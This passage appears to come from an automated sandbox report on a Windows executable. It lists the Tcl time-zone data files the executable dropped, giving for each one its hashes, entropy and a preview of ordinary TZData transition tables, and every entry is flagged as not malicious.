Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yekaterinburg) {. {-9223372036854775808 14544 0 LMT}. {-1592611344 14400 0 SVET}. {-1247544000 18000 0 SVEMMTT}. {354913200 21600 1 SVEST}. {370720800 18000 0 SVET}. {386449200 21600 1 SVEST}. {402256800 18000 0 SVET}. {417985200 21600 1 SVEST}. {433792800 18000 0 SVET}. {449607600 21600 1 SVEST}. {465339600 18000 0 SVET}. {481064400 21600 1 SVEST}. {496789200 18000 0 SVET}. {512514000 21600 1 SVEST}. {528238800 18000 0 SVET}. {543963600 21600 1 SVEST}. {559688400 18000 0 SVET}. {575413200 21600 1 SVEST}. {591138000 18000 0 SVET}. {606862800 21600 1 SVEST}. {622587600 18000 0 SVET}. {638312400 21600 1 SVEST}. {654642000 18000 0 SVET}. {670366800 14400 0 SVEMMTT}. {670370400 18000 1 SVEST}. {686095200 14400 0 SVET}. {695772000 18000 0 YEKMMTT}. {701805600 21600 1 YEKST}. {717526800 18000 0 YEKT}. {733266000 21600 1 YEKST}. {748990800

C:\Users\user\Desktop\tcl\tzdata\Asia\Yerevan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2013
Entropy (8bit):	3.917239737702558
Encrypted:	false
SSDEEP:	48:5x7DSQkgYXcEqmFbkANSJ+HDD64AuqYIeXzqKN08MDRiGUPBsCbBbiELW16sYuJw:7nSQkgycEXFbkANi+HDD6fb1ejqf3DEt
MD5:	85FDC8C4D6E028D88E775DF6958BD692
SHA1:	CF8EE7D6E87483D25F00D3A9586B5506A8960FFE
SHA-256:	9CA1596FC76AE4F64AEEE9350B666F9410EBE91DBFC8C7F2E1BB5EAA425E5EBD
SHA-512:	193BECE3C7B696C98C3D124DFF83C220147FF47A38CBEC5621D37FC673FC471D982E640DD9582ADDC009F5AD04922ABA75863780345EB7F38D8218F166DC5A57
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Yerevan) {. {-9223372036854775808 10680 0 LMT}. {-1441162680 10800 0 YERT}. {-405140400 14400 0 YERT}. {354916800 18000 1 YERST}. {370724400 14400 0 YERT}. {386452800 18000 1 YERST}. {402260400 14400 0 YERT}. {417988800 18000 1 YERST}. {433796400 14400 0 YERT}. {449611200 18000 1 YERST}. {465343200 14400 0 YERT}. {481068000 18000 1 YERST}. {496792800 14400 0 YERT}. {512517600 18000 1 YERST}. {528242400 14400 0 YERT}. {543967200 18000 1 YERST}. {559692000 14400 0 YERT}. {575416800 18000 1 YERST}. {591141600 14400 0 YERT}. {606866400 18000 1 YERST}. {622591200 14400 0 YERT}. {638316000 18000 1 YERST}. {654645600 14400 0 YERT}. {670370400 14400 1 YERST}. {685569600 14400 0 AMST}. {686098800 10800 0 AMT}. {701812800 14400 1 AMST}. {717534000 10800 0 AMT}. {733273200 14400 1 AMST}. {748998000 10800 0 AMT}. {764722800 14400 1 AMST}. {78

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Azores Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	10092
Entropy (8bit):	3.8655705813821184
Encrypted:	false
SSDEEP:	192:M03qYUil+0n538pCKzZEJV2Ihd58NhbTbW:M06Yfl+0n538pCzhT8NhbTbW
MD5:	E75D3BC64723728316CEB5942B639D00
SHA1:	B41355A21E01451A522F1C46F2089E2C7A7D82D0
SHA-256:	62F5ED90EB0A21486F523FAA9A2ED15DCEF011EDC3150B7A51AD731ED07DF950
SHA-512:	98E2B90B153A15A1590BAF6F5B2555962680C6DA73E1B11ECE0FA3144765CC7280A3CD89AFEAB1FF644DA27BF46E1862F891B5B83AA6955A1C10176B1C5ACBD3
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Azores) {. {-9223372036854775808 -6160 0 LMT}. {-2713904240 -6872 0 HMT}. {-1849557928 -7200 0 AZOT}. {-1689548400 -3600 1 AZOST}. {-1677794400 -7200 0 AZOT}. {-1667430000 -3600 1 AZOST}. {-1647730800 -7200 0 AZOT}. {-1635807600 -3600 1 AZOST}. {-1616194800 -7200 0 AZOT}. {-1604358000 -3600 1 AZOST}. {-1584658800 -7200 0 AZOT}. {-1572735600 -3600 1 AZOST}. {-1553036400 -7200 0 AZOT}. {-1541199600 -3600 1 AZOST}. {-1521500400 -7200 0 AZOT}. {-1442444400 -3600 1 AZOST}. {-1426806000 -7200 0 AZOT}. {-1379286000 -3600 1 AZOST}. {-1364770800 -7200 0 AZOT}. {-1348441200 -3600 1 AZOST}. {-1333321200 -7200 0 AZOT}. {-1316386800 -3600 1 AZOST}. {-1301266800 -7200 0 AZOT}. {-1284332400 -3600 1 AZOST}. {-1269817200 -7200 0 AZOT}. {-1221433200 -3600 1 AZOST}. {-1206918000 -7200 0 AZOT}. {-1191193200 -3600 1 AZOST}. {-1175468400 -7200 0 AZOT}. {

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Bermuda Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7684
Entropy (8bit):	3.7376923223964162
Encrypted:	false
SSDEEP:	192:UdPvxrPGgFEUlpde9pXbO53oVmM7IEc2fVGYu2yeB/T/eleWmBk81kS/kV6kef4E:lJv
MD5:	E55A91A96E1DC267AAEFAF27866F0A90
SHA1:	A3E8DB332114397F4F487256E9168E73784D3637
SHA-256:	A2EB47B25B3A389907DD242C86288073B0694B030B244CCF90421C0B510267BD
SHA-512:	9A8140365D76F1A83A98A35593638F2C047B3D2B1E9D0F6ACB2B321EBDB9CC5B6C8CCD3C110B127A12DCDB7D9ED16A8F7DB7DA7A8B4587486D060FACCA23F993
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Bermuda) {. {-9223372036854775808 -15558 0 LMT}. {-1262281242 -14400 0 AST}. {136360800 -10800 0 ADT}. {152082000 -14400 0 AST}. {167810400 -10800 1 ADT}. {183531600 -14400 0 AST}. {189316800 -14400 0 AST}. {199260000 -10800 1 ADT}. {215586000 -14400 0 AST}. {230709600 -10800 1 ADT}. {247035600 -14400 0 AST}. {262764000 -10800 1 ADT}. {278485200 -14400 0 AST}. {294213600 -10800 1 ADT}. {309934800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}. {357112800 -10800 1 ADT}. {372834000 -14400 0 AST}. {388562400 -10800 1 ADT}. {404888400 -14400 0 AST}. {420012000 -10800 1 ADT}. {436338000 -14400 0 AST}. {452066400 -10800 1 ADT}. {467787600 -14400 0 AST}. {483516000 -10800 1 ADT}. {499237200 -14400 0 AST}. {514965600 -10800 1 ADT}. {530686800 -14400 0 AST}. {544600800 -10800 1 ADT}. {562136400 -14400 0 AST}. {576050

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Canary Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6638
Entropy (8bit):	3.7197584018658656
Encrypted:	false
SSDEEP:	96:KXysG30NSfAewvtj544IrvfMS4pBs6nLUxZlJFXmA3SG7iL8malvkUEYo4Q:KXHIMj544IrvfMsbxZTH7qwQ
MD5:	AAE85975BA7E3409A6E0A224E4D851B7
SHA1:	CCF04296A11134D9E8F043C6147A210E13BEDAD4
SHA-256:	EFAAB28570806862B2C14185FD6AB103264FF8C3795DD6BD8EDABB435B532218
SHA-512:	2E836DF6FC2F6F4634386706C3EA5E2D5769A8FDC58A030AFB39ECD22BBB8259F1C89BC037CE6AF1074341A2D944DC5941DDD0F768F1A8283BC6B1831DC9216F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Canary) {. {-9223372036854775808 -3696 0 LMT}. {-1509663504 -3600 0 CANT}. {-733874400 0 0 WET}. {323827200 3600 1 WEST}. {338947200 3600 0 WEST}. {338950800 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 3600 1 WEST}. {780454800 0 0 WET}. {796179600 3600 1

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Cape_Verde Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	238
Entropy (8bit):	4.738409097680679
Encrypted:	false
SSDEEP:	6:SlSWB9X52RQ7Sm2OHDd0dtv+kdRfykVv+kZ+n7C:MBp5267SmdHD+CkffyXkQ7C
MD5:	AD3414825F9CF7235A14E2C5137D78EF
SHA1:	62E9A2B3618A74907376ACA8376CBCB6CBEA7BE8
SHA-256:	10A26A6B0F4FA276732D931A636446F62CDE425C2034C97697ACF2E76BDB68A6
SHA-512:	C42E19ACD89C1CC6C5D8C285A2F219DFB61C5EE26D1D69DCAA8DBA3A9C85ED70BAF174CEA4826DD9C82BFFEA78D918B45B5D8DD4877EE1B6D49025CFDAE0C919
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Cape_Verde) {. {-9223372036854775808 -5644 0 LMT}. {-1988144756 -7200 0 CVT}. {-862610400 -3600 1 CVST}. {-764118000 -7200 0 CVT}. {186120000 -3600 0 CVT}.}.

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Faeroe Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.655846706649014
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqLG4E2wFVAIgvMG4EeL2RQqG4EZrB/4RQqG4Ei:SlSWB9IZaM3yCwFVAIgvgL2RQ1rB/4R/
MD5:	08C5EE09B8BE16C5E974BA8070D448EA
SHA1:	D171C194F6D61A891D3390FF6492AEFB0F67646A
SHA-256:	7C6A6BCF5AAEAB1BB57482DF1BBC934D367390782F6D8C5783DBBBE663169A9B
SHA-512:	E885F3C30DBE178F88464ED505BA1B838848E6BB15C0D27733932CD0634174D9645C5098686E183CC93CB46DE7EB0DBF2EB64CB77A50FC337E2581E25107C9A6
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Atlantic/Faroe)]} {. LoadTimeZoneFile Atlantic/Faroe.}.set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe).

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Faroe Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6551
Entropy (8bit):	3.7148806034051316
Encrypted:	false
SSDEEP:	96:9bd30NSfAewvtj544IrvfMS4pBs6nLUxZlJFXmA3SG7iL8malvkUEYo4Q:8IMj544IrvfMsbxZTH7qwQ
MD5:	918E1825106C5C73B203B718918311DC
SHA1:	7C31B3521B396FE6BE7162BAECC4CFB4740F622B
SHA-256:	B648E691D8F3417B77EFB6D6C2F5052B3C4EAF8B5354E018EE2E9BD26F867B71
SHA-512:	5B1B5FE82A13127E3C63C8FB0A8CBD45A7277EF29720B937BB3174E8301830018755416D604F3551622E2E4D365D35E4EE1DF39B587A73E43AE0C68D1996B771
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Faroe) {. {-9223372036854775808 -1624 0 LMT}. {-1955748776 0 0 WET}. {347155200 0 0 WET}. {354675600 3600 1 WEST}. {370400400 0 0 WET}. {386125200 3600 1 WEST}. {401850000 0 0 WET}. {417574800 3600 1 WEST}. {433299600 0 0 WET}. {449024400 3600 1 WEST}. {465354000 0 0 WET}. {481078800 3600 1 WEST}. {496803600 0 0 WET}. {512528400 3600 1 WEST}. {528253200 0 0 WET}. {543978000 3600 1 WEST}. {559702800 0 0 WET}. {575427600 3600 1 WEST}. {591152400 0 0 WET}. {606877200 3600 1 WEST}. {622602000 0 0 WET}. {638326800 3600 1 WEST}. {654656400 0 0 WET}. {670381200 3600 1 WEST}. {686106000 0 0 WET}. {701830800 3600 1 WEST}. {717555600 0 0 WET}. {733280400 3600 1 WEST}. {749005200 0 0 WET}. {764730000 3600 1 WEST}. {780454800 0 0 WET}. {796179600 3600 1 WEST}. {811904400 0 0 WET}. {828234000 3600 1 WEST}. {846378000 0 0 WET}.

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Jan_Mayen Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.92967249261586
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVyWJooedVAIgoqxWJ0YF2RQqG0EHEcAg/h8QasWJ/n:SlSWB9IZaM3ymSDdVAIgo2Q2RQaK8H
MD5:	AD9B5217497DBC1CE598573B85F3C056
SHA1:	60984544F5BBD4A5B2B8F43741D66A573A2CF1DC
SHA-256:	BE291E952254B6F0C95C2E2497BE12410D7F1E36D0D1035B3A9BC65D0EDCB65F
SHA-512:	F5D47008495425C386EBAB426195393168E402726405CF23826571E548A3CEFABBA51D87D637C0724FF2CC4F1276D81EACF14D0F9CFC7CBFCC025EEFA0960278
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Oslo)]} {. LoadTimeZoneFile Europe/Oslo.}.set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Oslo).

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Madeira Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9568
Entropy (8bit):	3.848849485880252
Encrypted:	false
SSDEEP:	192:jZagJmz1qVIZtQIMj544IrvfMsbxZTH7qwQ:jZagJmz1qVIZtbMUM8xZTH7qwQ
MD5:	29DFDDBC3F9D28FC86562E7248853258
SHA1:	B2E6FED5CE4ADD1F3653268D8CC734DBCFEEF8C6
SHA-256:	34F5B676D078AF3987C03D0854F5B2888E50657193710C6C2C69A36ADC9B49FB
SHA-512:	B75798BF1C3AB11A5DD0DA7F9F1C9901160B9ACE6A50C2AD40FD1AB77C208027D3286E3BFE7BF389B193D10278FCDEF4C1C68739D935CD2F50440260DB3DAC4F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Madeira) {. {-9223372036854775808 -4056 0 LMT}. {-2713906344 -4056 0 FMT}. {-1849560744 -3600 0 MADT}. {-1689552000 0 1 MADST}. {-1677798000 -3600 0 MADT}. {-1667433600 0 1 MADST}. {-1647734400 -3600 0 MADT}. {-1635811200 0 1 MADST}. {-1616198400 -3600 0 MADT}. {-1604361600 0 1 MADST}. {-1584662400 -3600 0 MADT}. {-1572739200 0 1 MADST}. {-1553040000 -3600 0 MADT}. {-1541203200 0 1 MADST}. {-1521504000 -3600 0 MADT}. {-1442448000 0 1 MADST}. {-1426809600 -3600 0 MADT}. {-1379289600 0 1 MADST}. {-1364774400 -3600 0 MADT}. {-1348444800 0 1 MADST}. {-1333324800 -3600 0 MADT}. {-1316390400 0 1 MADST}. {-1301270400 -3600 0 MADT}. {-1284336000 0 1 MADST}. {-1269820800 -3600 0 MADT}. {-1221436800 0 1 MADST}. {-1206921600 -3600 0 MADT}. {-1191196800 0 1 MADST}. {-1175472000 -3600 0 MADT}. {-1127692800 0 1 MADST}. {-1111968000 -3600 0 MAD

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Reykjavik Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1911
Entropy (8bit):	3.933260527747483
Encrypted:	false
SSDEEP:	48:50hGWG3eGiGAGlGdG38GCGu9GoGllG7yGPGYvGHGqGCGEFGrOG6BGFGjGgGSaGZK:Tl39RXkM3TxBvi7h+YemJx1htEy3S5ZK
MD5:	813097037A96412A060BC45D271FB924
SHA1:	F8F22CAA41B28532AB63F94197F2B6729DBA7084
SHA-256:	9175FD0F69436B341D05FF7220F01523A4AA532A72C8E0E90461AED662D1C56B
SHA-512:	2281AC248AD70FCB67E41790B601BA27596FC1E392C71C7C676E4CEC05D829E1967FC313333A258FF1DA7A08C90BEE70DC21B30A0C22A300BCDD02C35448C8C0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Reykjavik) {. {-9223372036854775808 -5244 0 LMT}. {-4197047556 -5268 0 RMT}. {-1956609132 -3600 0 IST}. {-1668211200 0 1 ISST}. {-1647212400 -3600 0 IST}. {-1636675200 0 1 ISST}. {-1613430000 -3600 0 IST}. {-968025600 0 1 ISST}. {-949615200 -3600 0 IST}. {-942008400 0 1 ISST}. {-920239200 -3600 0 IST}. {-909957600 0 1 ISST}. {-888789600 -3600 0 IST}. {-877903200 0 1 ISST}. {-857944800 -3600 0 IST}. {-846453600 0 1 ISST}. {-826495200 -3600 0 IST}. {-815004000 0 1 ISST}. {-795045600 -3600 0 IST}. {-783554400 0 1 ISST}. {-762991200 -3600 0 IST}. {-752104800 0 1 ISST}. {-731541600 -3600 0 IST}. {-717631200 0 1 ISST}. {-700092000 -3600 0 IST}. {-686181600 0 1 ISST}. {-668642400 -3600 0 IST}. {-654732000 0 1 ISST}. {-636588000 -3600 0 IST}. {-623282400 0 1 ISST}. {-605743200 -3600 0 IST}. {-591832800 0 1 ISST}. {-573688800 -3600

C:\Users\user\Desktop\tcl\tzdata\Atlantic\South_Georgia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	154
Entropy (8bit):	5.004788019784553
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52RQqGtlN62/EUXGm2OHXT14YvXhFvd6WL:SlSWB9X52RQrlo2Mbm2OHXqYPTF6WL
MD5:	954625C02619664D3B5C4B72A22D8C51
SHA1:	933A7E9368864232B29823FEEFE045032BE154A5
SHA-256:	D23882718ECEB397D330B463DCA1C7E266134F060E0AED421F056E7379E3E1A3
SHA-512:	DD9E58A17967F91937BB71C6A9DD296B4AE49DD7C264874E6720D2B521EAFC1D4F3BF0CA66F931BA16499225390DD963110E9FE8524130F407328E3E9F8BD8BE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/South_Georgia) {. {-9223372036854775808 -8768 0 LMT}. {-2524512832 -7200 0 GST}.}.

C:\Users\user\Desktop\tcl\tzdata\Atlantic\St_Helena Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	175
Entropy (8bit):	4.919232775001251
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52RQqGt4EcXGm2OHeH+YvXBNUWjcrciU1WXVLd:SlSWB9X52RQr4wm2OHhYPBBQIiU1WXv
MD5:	44CE7C3343864A2881C9B97863DDAB40
SHA1:	E74D134D8DD76FDA0FC9054F7FA2B5EF92E06E6F
SHA-256:	632D25BBEF9EAE2A82D3288DCD66C8874A1B11CC9A045C1C8DA0883B454B2375
SHA-512:	39CB2DF3993306C551F8188E01436425978831D4FDAAE5EEA6AE5943D6131B190429384ABD1D5A6749805138CC486467BB03D04E1003239B342DEDC023673879
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/St_Helena) {. {-9223372036854775808 -1368 0 LMT}. {-2524520232 -1368 0 JMT}. {-599614632 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Atlantic\Stanley Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2215
Entropy (8bit):	3.889108793636345
Encrypted:	false
SSDEEP:	48:50wqSiSiSafSYSGpSWW75ESrS0SFSpSL/ShSvSCSCZSCSwSKUXSzSNSnSw/S/pSu:Pq5vz9Ny7OSpgEk/kyXZLhWX2IeXApZ5
MD5:	B08E4FE18C411591DB170A4C995088CA
SHA1:	6D3928877CEF2C20924BA30FBF61EA6933EF925C
SHA-256:	E1410499E96950029924485AB21250C09AB0E3494DD05128C935FB99C8BBABE9
SHA-512:	888CBB8C19F677B73D6203B622501922BD4DC59FA6D962A4EEE6C6DA2A0047739346E0794C5F6D0482BDDAB89289479D2A07986C3C23739657B02FF3B4000AB9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Stanley) {. {-9223372036854775808 -13884 0 LMT}. {-2524507716 -13884 0 SMT}. {-1824235716 -14400 0 FKT}. {-1018209600 -10800 1 FKST}. {-1003093200 -14400 0 FKT}. {-986760000 -10800 1 FKST}. {-971643600 -14400 0 FKT}. {-954705600 -10800 1 FKST}. {-939589200 -14400 0 FKT}. {-923256000 -10800 1 FKST}. {-908139600 -14400 0 FKT}. {-891806400 -10800 1 FKST}. {-876690000 -14400 0 FKT}. {-860356800 -10800 1 FKST}. {420606000 -7200 0 FKT}. {433303200 -7200 1 FKST}. {452052000 -10800 0 FKT}. {464151600 -7200 1 FKST}. {483501600 -10800 0 FKT}. {495597600 -14400 0 FKT}. {495604800 -10800 1 FKST}. {514350000 -14400 0 FKT}. {527054400 -10800 1 FKST}. {545799600 -14400 0 FKT}. {558504000 -10800 1 FKST}. {577249200 -14400 0 FKT}. {589953600 -10800 1 FKST}. {608698800 -14400 0 FKT}. {621403200 -10800 1 FKST}. {640753200 -14400 0 FKT}. {652852800

C:\Users\user\Desktop\tcl\tzdata\Australia\ACT Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.813373101386862
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjpMFBx/h4QWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DCeMFB/4D2
MD5:	F48AD4B81CD3034F6E5D3CA1B5A8BDD4
SHA1:	676FE3F50E3E132C1FD185A1EE1D8C830763204F
SHA-256:	553D7DA9A2EDBD933E8920573AE6BCBAA00302817939046CF257CAEACEC19FAD
SHA-512:	36A4E2286FBEF2F4ED4B9CD1A71136E227FEF4B693F9F43649B790E859221EE470679A7E3C283770DA5CB0113A1C8C1F99480E7020328FFE3E9C870798B092F5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/ACT) $TZData(:Australia/Sydney).

C:\Users\user\Desktop\tcl\tzdata\Australia\Adelaide Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7831
Entropy (8bit):	3.695348510541158
Encrypted:	false
SSDEEP:	96:JMWq8at75CXhCV6hGyM6uXaVQDOmbMxJoOEA+AneZFJP0jWEvAj6hA2nP5Mk9K15:JM2aScwcXaVUbMzoOEAi4QP+KTyK
MD5:	1033576141DC981DC146C0E0A559F84F
SHA1:	0A5AFCA223A15C606816C112B00653CCA06F1B49
SHA-256:	63A457205CF469C00EA5C18932E690C3003239C125A56906EDAD7FBA0C8AD3D4
SHA-512:	762C409B5339C74C7F27B269AF8ABFF0672A2AA85732E212317F6E675B4485C0EBA23261C0DC94574689F44E63ADE21B618DBEB13938ACEE219CBA6E564BF7EB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Adelaide) {. {-9223372036854775808 33260 0 LMT}. {-2364110060 32400 0 CST}. {-2230189200 34200 0 CST}. {-1672565340 37800 1 CST}. {-1665390600 34200 0 CST}. {-883639800 37800 1 CST}. {-876126600 34200 0 CST}. {-860398200 37800 1 CST}. {-844677000 34200 0 CST}. {-828343800 37800 1 CST}. {-813227400 34200 0 CST}. {31501800 34200 0 CST}. {57688200 37800 1 CST}. {67969800 34200 0 CST}. {89137800 37800 1 CST}. {100024200 34200 0 CST}. {120587400 37800 1 CST}. {131473800 34200 0 CST}. {152037000 37800 1 CST}. {162923400 34200 0 CST}. {183486600 37800 1 CST}. {194977800 34200 0 CST}. {215541000 37800 1 CST}. {226427400 34200 0 CST}. {246990600 37800 1 CST}. {257877000 34200 0 CST}. {278440200 37800 1 CST}. {289326600 34200 0 CST}. {309889800 37800 1 CST}. {320776200 34200 0 CST}. {341339400 37800 1 CST}. {352225800 34200 0 CST}.

C:\Users\user\Desktop\tcl\tzdata\Australia\Brisbane Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	633
Entropy (8bit):	4.187124529877168
Encrypted:	false
SSDEEP:	6:SlSWB9X52DC7Wvm2OHL/mYPqCIcrWE9/593ZSeE9VerhaYY984B8UpN5in:MBp52nmdHLOYPhCkIr5mZ
MD5:	5091BF610EE393896C7DCD4A579F6984
SHA1:	8ED51F0377A77B27F37E62CEDB191EE233240503
SHA-256:	6519F2F3FD64BE78A208B05A4EE38DD065ACF0A3DD73F67906986AA94FE6A5F7
SHA-512:	97FA18CFEADF63B9E86E16EE3E1089A9DA715BFE15C1C03372583C3A54DBE5EF62FADBDDA89E5E4D7A947D43E8C73C7B3F975188A18ECBB411EEF8AAA8A2DEB7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Brisbane) {. {-9223372036854775808 36728 0 LMT}. {-2366791928 36000 0 EST}. {-1672567140 39600 1 EST}. {-1665392400 36000 0 EST}. {-883641600 39600 1 EST}. {-876128400 36000 0 EST}. {-860400000 39600 1 EST}. {-844678800 36000 0 EST}. {-828345600 39600 1 EST}. {-813229200 36000 0 EST}. {31500000 36000 0 EST}. {57686400 39600 1 EST}. {67968000 36000 0 EST}. {625593600 39600 1 EST}. {636480000 36000 0 EST}. {657043200 39600 1 EST}. {667929600 36000 0 EST}. {688492800 39600 1 EST}. {699379200 36000 0 EST}.}.

C:\Users\user\Desktop\tcl\tzdata\Australia\Broken_Hill Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7892
Entropy (8bit):	3.702480794401623
Encrypted:	false
SSDEEP:	96:ERiWq8at75chCVJLAyg6uXaVQDOmbMxJoOEA+AneZFJP0jWEvAj6hA2nP5Mk9K15:ERi2a7BIXaVUbMzoOEAi4QP+KTyK
MD5:	CA4219C56719169129AC6986DCFE8817
SHA1:	4C03E4C3A9CA95421A4F713F839900526A7D5CBE
SHA-256:	0DC0EFB9C0D598F6AA7C92B9B980FA3F4C31303770CCF19BA4097E6A94B3610C
SHA-512:	7B004317F5FA3A28BDB166EB7AC16E4203F88FC75B90CA3C686CD13C1FCE3233382849F594378DD4C69534783AC631CE76CB009F654A444C0B0835ADE354E044
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Broken_Hill) {. {-9223372036854775808 33948 0 LMT}. {-2364110748 36000 0 EST}. {-2314951200 32400 0 CST}. {-2230189200 34200 0 CST}. {-1672565340 37800 1 CST}. {-1665390600 34200 0 CST}. {-883639800 37800 1 CST}. {-876126600 34200 0 CST}. {-860398200 37800 1 CST}. {-844677000 34200 0 CST}. {-828343800 37800 1 CST}. {-813227400 34200 0 CST}. {31501800 34200 0 CST}. {57688200 37800 1 CST}. {67969800 34200 0 CST}. {89137800 37800 1 CST}. {100024200 34200 0 CST}. {120587400 37800 1 CST}. {131473800 34200 0 CST}. {152037000 37800 1 CST}. {162923400 34200 0 CST}. {183486600 37800 1 CST}. {194977800 34200 0 CST}. {215541000 37800 1 CST}. {226427400 34200 0 CST}. {246990600 37800 1 CST}. {257877000 34200 0 CST}. {278440200 37800 1 CST}. {289326600 34200 0 CST}. {309889800 37800 1 CST}. {320776200 34200 0 CST}. {341339400 37800 1 CST}

C:\Users\user\Desktop\tcl\tzdata\Australia\Canberra Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.80238049701662
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjnSV1+QWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DCcq+DCyu
MD5:	16F9CFC4C5B9D5F9F9DB9346CECE4393
SHA1:	ED1ED7BA73EB287D2C8807C4F8EF3EFA516F5A68
SHA-256:	853A159B8503B9E8F42BBCE60496722D0A334FD79F30448BAD651F18BA388055
SHA-512:	9572CCB1BC499BADA72B5FE533B56156DB9EB0DEDFD4AE4397AD60F2A8AF5991F7B1B06A1B8D14C73832543AF8C12F5B16A9A80D093BF0C7ED6E38FF8B66E197
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/Canberra) $TZData(:Australia/Sydney).

C:\Users\user\Desktop\tcl\tzdata\Australia\Currie Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7829
Entropy (8bit):	3.6469974318008025
Encrypted:	false
